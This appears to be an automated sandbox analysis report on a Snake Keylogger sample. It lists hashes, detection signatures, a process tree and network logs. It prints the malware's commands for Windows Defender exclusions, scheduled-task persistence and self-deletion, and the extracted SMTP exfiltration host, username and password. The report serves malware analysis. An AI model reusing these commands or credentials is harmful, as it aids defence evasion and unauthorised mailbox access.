Overview

overview

10

Static

static

3

de9e447ac1...c7.exe

windows7-x64

10

de9e447ac1...c7.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/12/2024, 03:25 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe

  • Size

    513KB

  • MD5

    f747bd84ca6e30d0f6c82363613df40b

  • SHA1

    c50a288da4d21ee75622bd30fc3a2fa69a488e8c

  • SHA256

    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7

  • SHA512

    d33b0b4c46cf265584104876607a59374eab4e38e82b213a1852e47c22fc25ef378d57d933586eb0f8bbd3fcdb4e26e2d8c0d89beb696f16f49256675dcdb872

  • SSDEEP

    6144:8eEKVOJIA7ezJbjWSECMLYmPxjzkoz9btOvDeF/4erMBx6taEga4X2q/uXR8Yx5j:bUSFbjp4zxoferaKih4RzycBIyp

Score
10/10
snakekeyloggerdiscoveryexecutionkeyloggerstealer

Malware Config

Extracted

Family

snakekeylogger

Credentials

  • Protocol:     smtp
  • Host:
    mail.murchisonspice.co.za
  • Port:
    587
  • Username:
    orders@murchisonspice.co.za
  • Password:
    orders786q#

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

    stealerkeyloggersnakekeylogger
  • Snake Keylogger payload 1 IoCs
  • Snakekeylogger family
    snakekeylogger
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    "C:\Users\Admin\AppData\Local\Temp\de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3744
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2256
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\sXYzukdZLvdwQb.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4984
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sXYzukdZLvdwQb" /XML "C:\Users\Admin\AppData\Local\Temp\tmpC9B8.tmp"
      2⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:4760
    • C:\Users\Admin\AppData\Local\Temp\de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
      "C:\Users\Admin\AppData\Local\Temp\de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5088
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2540
        • C:\Windows\SysWOW64\choice.exe
          choice /C Y /N /D Y /T 3
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2660

Network

  • flag-us
    DNS
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    88.210.23.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    88.210.23.2.in-addr.arpa
    IN PTR
    Response
    88.210.23.2.in-addr.arpa
    IN PTR
    a2-23-210-88deploystaticakamaitechnologiescom
  • flag-us
    DNS
    0.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    154.239.44.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    154.239.44.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    checkip.dyndns.org
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    8.8.8.8:53
    Request
    checkip.dyndns.org
    IN A
    Response
    checkip.dyndns.org
    IN CNAME
    checkip.dyndns.com
    checkip.dyndns.com
    IN A
    132.226.247.73
    checkip.dyndns.com
    IN A
    193.122.130.0
    checkip.dyndns.com
    IN A
    193.122.6.168
    checkip.dyndns.com
    IN A
    132.226.8.169
    checkip.dyndns.com
    IN A
    158.101.44.242
  • flag-br
    GET
    http://checkip.dyndns.org/
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:49 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 35dd0809dafe2f4df972c2c071bdc0dc
  • flag-br
    GET
    http://checkip.dyndns.org/
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:49 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 25ba7606a30fc8be7682734a462bebab
  • flag-br
    GET
    http://checkip.dyndns.org/
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:50 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: fd8a0039b0fc52fff26a8a1bacbdb01d
  • flag-br
    GET
    http://checkip.dyndns.org/
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:50 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: ec28cc0ee149e0e09157672414d2aef8
  • flag-br
    GET
    http://checkip.dyndns.org/
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:52 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: fac5f795cc2df39de56e264ac4cc346f
  • flag-br
    GET
    http://checkip.dyndns.org/
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:53 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 70cf23be1236cc7e78f786e8ba55e67f
  • flag-br
    GET
    http://checkip.dyndns.org/
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:54 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 524cebf497ad11e1b1d55d0368d0cb61
  • flag-br
    GET
    http://checkip.dyndns.org/
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:54 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 0ffae663004d6f66aae56cc35cbd13b1
  • flag-br
    GET
    http://checkip.dyndns.org/
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:54 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 50e620af991c617508df7e6362147a05
  • flag-us
    DNS
    reallyfreegeoip.org
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    8.8.8.8:53
    Request
    reallyfreegeoip.org
    IN A
    Response
    reallyfreegeoip.org
    IN A
    172.67.177.134
    reallyfreegeoip.org
    IN A
    104.21.67.152
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    172.67.177.134:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:49 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 1943003
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sUK44IpkoRondjeGDTa13I7cQ7HOe20%2BLOeV1ejn7M9JyTtZrAsGmlOWm669LMttwsoDx%2Ffyl3UtQrl8AZsfW5p39%2FtmaMENRNnA9V%2BdXP4PP0VOZLuDLojy1caPNDGLYvlQSuZe"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ed92bc28a859457-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=29690&min_rtt=26335&rtt_var=11929&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3010&recv_bytes=390&delivery_rate=128345&cwnd=233&unsent_bytes=0&cid=80ffa150a0a1cf57&ts=95&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    172.67.177.134:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:50 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 1943004
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qxcjxW%2BYTRBAauyy98GXCyKy9KKHAu%2B8ZQAWA%2FAksrnPhNVVxMAeh57R%2F4r%2FdOLZo0zAuSuQMWmb9pCjH64ObPMsGi66qUWVouJiGQSMMo0ViKt3nkz%2FP60vJWeuXxrynBSykcIC"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ed92bc46bee9457-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=35227&min_rtt=26335&rtt_var=20022&sent=6&recv=8&lost=0&retrans=0&sent_bytes=4281&recv_bytes=482&delivery_rate=128345&cwnd=234&unsent_bytes=0&cid=80ffa150a0a1cf57&ts=401&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    172.67.177.134:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:50 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 1943004
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GVoNXcRgfGmV3E0fBRj1UUkuO%2B%2BEiLqKoahF1Tg2jxoRwKnmmUNAxsQvEpfuh6FzTDfPU%2FmaXOuIJt7e3rZPhIubwEg5OhNHp3J51mP4nXcmEEjQDQxFJX3vtpeNvHla6rUggXSP"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ed92bc87e639457-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=39834&min_rtt=26335&rtt_var=24230&sent=7&recv=10&lost=0&retrans=0&sent_bytes=5557&recv_bytes=574&delivery_rate=128345&cwnd=235&unsent_bytes=0&cid=80ffa150a0a1cf57&ts=1046&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    172.67.177.134:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:53 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 1943007
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=caLoYYubvAXxdmxIF5HYhROn5UbCyjzS8Wo9g1JYoxueBVjR6FqWqbzD0F5bmRKm5gE1GacPAS0AgApD63SgWuQ9cQVqWSHmqEKgnkQ7bXI3slIQ9h4GN3cpX0aERUzCVPGQMxbm"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ed92bd6bf799457-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=50098&min_rtt=26335&rtt_var=38700&sent=8&recv=12&lost=0&retrans=0&sent_bytes=6829&recv_bytes=666&delivery_rate=128345&cwnd=236&unsent_bytes=0&cid=80ffa150a0a1cf57&ts=3324&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    172.67.177.134:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:53 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 1943007
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kZfbrlH4QJOpgIuKoNN66fXW2oSTCzJNAu5dglktgDRXBi9waH3sK9Ee4ylZ7BPN7pwffhtp8RST05fqcAIUpRkD5WK1MmEVbvMq3puPQ6VNIrsDOch6BptnNRkXNpDMgPwiaXTz"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ed92bd838699457-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=64312&min_rtt=26335&rtt_var=57452&sent=9&recv=14&lost=0&retrans=0&sent_bytes=8095&recv_bytes=758&delivery_rate=128345&cwnd=237&unsent_bytes=0&cid=80ffa150a0a1cf57&ts=3566&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    172.67.177.134:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:54 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 1943008
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=78tyxRYz9qjcgenk9uhvTjQwltLR%2FKalcqJAktxdtXmPHZaRS0B5SezpdQAl9UaYp1sVRX6XR2kEmAYt0deTx61L60VB8l0%2FDnbFBx72BFXy5hAOIx46hWxAM7pX%2BDyz%2BkOdTMx%2B"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ed92be00df09457-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=71596&min_rtt=26335&rtt_var=57658&sent=10&recv=16&lost=0&retrans=0&sent_bytes=9361&recv_bytes=850&delivery_rate=128345&cwnd=237&unsent_bytes=0&cid=80ffa150a0a1cf57&ts=4815&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    172.67.177.134:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:54 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 1943008
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SduV6SHUMwZUN%2FdtLkduKGCtFzWhZHhLiuVm2KBlHgUfXj2Op8j%2FoPKlWVrszDjtgTpIuXpGK676uKCHOf1z0y0mPgnbkX4kQgr%2BuM8K4%2FZ5HUveQo%2BiykEBD7qNlqKnnbF6%2BeFh"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ed92be19f159457-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=89121&min_rtt=26335&rtt_var=78293&sent=11&recv=18&lost=0&retrans=0&sent_bytes=10638&recv_bytes=942&delivery_rate=128345&cwnd=237&unsent_bytes=0&cid=80ffa150a0a1cf57&ts=5064&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    Remote address:
    172.67.177.134:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Fri, 06 Dec 2024 03:25:55 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 1943009
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SNSiYhTfz5yffqR%2BbmIPs40qxNQwvfV2dmcUE56a0uQxinYtPIdc96Z0hcWhSH%2FcnxtlEessdDLR%2BNXhCtxz3vcUaf8f%2B8QjyL%2FxWuEv1vfjk9Ux9lrL6F2UwjEQMaLES%2F2ddW1%2B"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ed92be318439457-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=98766&min_rtt=26335&rtt_var=78011&sent=12&recv=20&lost=0&retrans=0&sent_bytes=11918&recv_bytes=1034&delivery_rate=128345&cwnd=237&unsent_bytes=0&cid=80ffa150a0a1cf57&ts=5306&x=0"
  • flag-us
    DNS
    73.247.226.132.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.247.226.132.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    134.177.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    134.177.67.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    53.210.109.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.210.109.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    171.39.242.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    171.39.242.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    21.236.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    21.236.111.52.in-addr.arpa
    IN PTR
    Response
  • 132.226.247.73:80
    http://checkip.dyndns.org/
    http
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    1.9kB
     3.5kB
     17
    15

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200
  • 172.67.177.134:443
    https://reallyfreegeoip.org/xml/181.215.176.83
    tls, http
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    2.1kB
     13.8kB
     22
    14

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200
  • 8.8.8.8:53
    228.249.119.40.in-addr.arpa
    dns
    73 B
     159 B
     1
    1

    DNS Request

    228.249.119.40.in-addr.arpa

  • 8.8.8.8:53
    88.210.23.2.in-addr.arpa
    dns
    70 B
     133 B
     1
    1

    DNS Request

    88.210.23.2.in-addr.arpa

  • 8.8.8.8:53
    0.159.190.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    0.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    154.239.44.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    154.239.44.20.in-addr.arpa

  • 8.8.8.8:53
    checkip.dyndns.org
    dns
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    64 B
     176 B
     1
    1

    DNS Request

    checkip.dyndns.org

    DNS Response

    132.226.247.73
    193.122.130.0
    193.122.6.168
    132.226.8.169
    158.101.44.242

  • 8.8.8.8:53
    reallyfreegeoip.org
    dns
    de9e447ac18100ef9696307210d5de75744aaa34f346c0b3bb894f7e4fff92c7.exe
    65 B
     97 B
     1
    1

    DNS Request

    reallyfreegeoip.org

    DNS Response

    172.67.177.134
    104.21.67.152

  • 8.8.8.8:53
    73.247.226.132.in-addr.arpa
    dns
    73 B
     158 B
     1
    1

    DNS Request

    73.247.226.132.in-addr.arpa

  • 8.8.8.8:53
    134.177.67.172.in-addr.arpa
    dns
    73 B
     135 B
     1
    1

    DNS Request

    134.177.67.172.in-addr.arpa

  • 8.8.8.8:53
    28.118.140.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    28.118.140.52.in-addr.arpa

  • 8.8.8.8:53
    53.210.109.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    53.210.109.20.in-addr.arpa

  • 8.8.8.8:53
    171.39.242.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    171.39.242.20.in-addr.arpa

  • 8.8.8.8:53
    21.236.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    21.236.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

